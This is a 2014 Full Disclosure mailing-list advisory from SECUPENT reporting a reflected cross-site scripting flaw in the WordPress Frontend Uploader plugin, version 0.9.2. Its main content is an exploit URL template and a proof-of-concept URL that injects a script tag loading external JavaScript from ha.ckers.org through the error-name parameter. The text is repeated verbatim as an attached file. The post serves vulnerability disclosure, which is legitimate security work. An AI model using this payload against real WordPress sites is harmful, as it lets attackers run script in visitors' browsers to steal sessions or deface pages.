[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Wordpress Frontend Uploader Cross Site Scripting(XSS)
From:       SECUPENT Research Center <research () secupent ! com>
Date:       2014-12-27 19:18:49
Message-ID: 14a8d2fd457.f01a2e7570499.5831076379738549250 () secupent ! com
[Download RAW message or body]

Exploit Title:  Wordpress Frontend Uploader Cross Site Scripting(XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2




Exploit :


http://TARGET/[forntEndUploaderPage]=59&amp;errors[fu-disallowed-mime-type][0][name]=XSS 


Example(p0c): 
http://EXAMPLE/wordpress/?page_id=59&amp;&amp;errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E



Screenshot: 
Link: http://secupent.com/exploit/images/frontend-uploader-xss.png
Mirror: http://vulnerability.io/exploit/images/frontend-uploader-xss.png


Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, \
cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security \
researchers.  


["wordpress frontend uploader XSS.txt" (text/plain)]

Exploit Title:  Wordpress Frontend Uploader Cross Site Scripting(XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2


Exploit :

http://TARGET/[forntEndUploaderPage]=59&errors[fu-disallowed-mime-type][0][name]=XSS 

Example(p0c): 
http://EXAMPLE/wordpress/?page_id=59&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E


Screenshot: 
Link: http://secupent.com/exploit/images/frontend-uploader-xss.png
Mirror: http://vulnerability.io/exploit/images/frontend-uploader-xss.png

Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, \
cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security \
researchers.  



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic